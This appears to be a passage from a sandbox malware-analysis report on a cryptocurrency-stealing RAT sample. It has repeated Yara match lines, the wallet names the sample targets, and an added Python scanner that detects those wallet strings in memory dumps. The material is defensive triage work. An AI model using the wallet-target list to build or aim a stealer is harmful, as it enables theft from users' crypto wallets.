Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Electrum
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: BytecoinJaxx!com.liberty.jaxx
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
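The wallet strings found in the wKj1CBkbos.exe memory dump (Electrum, Exodus, Ethereum, com.liberty.jaxx, Bytecoin, keystore) are the targets of the stealer's file-grab list. When triaging an unpacked PE or a process dump by hand, the same list has to be searched in two encodings, because string literals in a .NET assembly live in the #US heap as UTF-16LE while Python and C code keep them as ASCII or UTF-8, and a single-encoding search silently misses half of a mixed dropper like this one. The scanner below is an added example for this page, not a rule from the sandbox or the sample's code; the input blob is constructed inline with the report's strings embedded in both encodings, and the three-wallet threshold for the verdict is an assumption for illustration.

```python
"""Search a binary or memory dump for the wallet-target strings this report surfaced (added example)."""
import re
from dataclasses import dataclass

# Marker -> bytes as they appear in ASCII/UTF-8 code; "keystore" is generic and not counted as a wallet
WALLET_MARKERS = {
    "Electrum": b"Electrum",
    "Exodus": b"Exodus",
    "Ethereum": b"Ethereum",
    "Jaxx": b"com.liberty.jaxx",
    "Bytecoin": b"Bytecoin",
    "keystore": b"keystore",
}
GENERIC = {"keystore"}


@dataclass(frozen=True)
class Hit:
    marker: str
    encoding: str
    offset: int


def _compiled_patterns():
    """Yield (marker, encoding, regex) for both the ASCII and the UTF-16LE form of every marker."""
    for name, ascii_bytes in WALLET_MARKERS.items():
        yield name, "ascii", re.compile(re.escape(ascii_bytes), re.IGNORECASE)
        utf16 = ascii_bytes.decode("ascii").encode("utf-16-le")
        yield name, "utf-16le", re.compile(re.escape(utf16), re.IGNORECASE)  # NULs are unaffected by IGNORECASE


PATTERNS = list(_compiled_patterns())


def scan_blob(blob: bytes) -> list:
    """All marker occurrences in the blob, ordered by offset."""
    hits = [Hit(name, enc, m.start()) for name, enc, pat in PATTERNS for m in pat.finditer(blob)]
    return sorted(hits, key=lambda h: (h.offset, h.marker))


def wallets_referenced(hits) -> set:
    return {h.marker for h in hits if h.marker not in GENERIC}


def verdict(hits, min_wallets: int = 3) -> str:
    """Assumed triage threshold: three distinct wallet names in one image is a file-grab list, not a coincidence."""
    if len(wallets_referenced(hits)) >= min_wallets:
        return "wallet-targeting string set present"
    return "no wallet-targeting string set"


# Constructed sample: report strings in both encodings, separated by NUL padding so offsets are easy to check
PAD = b"\x00" * 16
SAMPLE_BLOB = (PAD + b"Electrum" + PAD + "Exodus".encode("utf-16-le") + PAD + b"com.liberty.jaxx"
               + PAD + "keystore".encode("utf-16-le") + PAD + b"Ethereum" + PAD)

if __name__ == "__main__":
    found = scan_blob(SAMPLE_BLOB)
    for h in found:
        print(f"{h.offset:6d}  {h.encoding:9s}  {h.marker}")
    print(verdict(found))
```

On a real dump, feed the file contents to scan_blob and look at the offsets as well as the names: a tight cluster of wallet names at neighbouring offsets is the target table itself, whereas a single hit far from the rest is more often a library string or a file path the process happened to touch.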

Remote Access Functionality

Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED
Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wKj1CBkbos.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 52cheatand52rat.exe PID: 4420, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe, type: DROPPED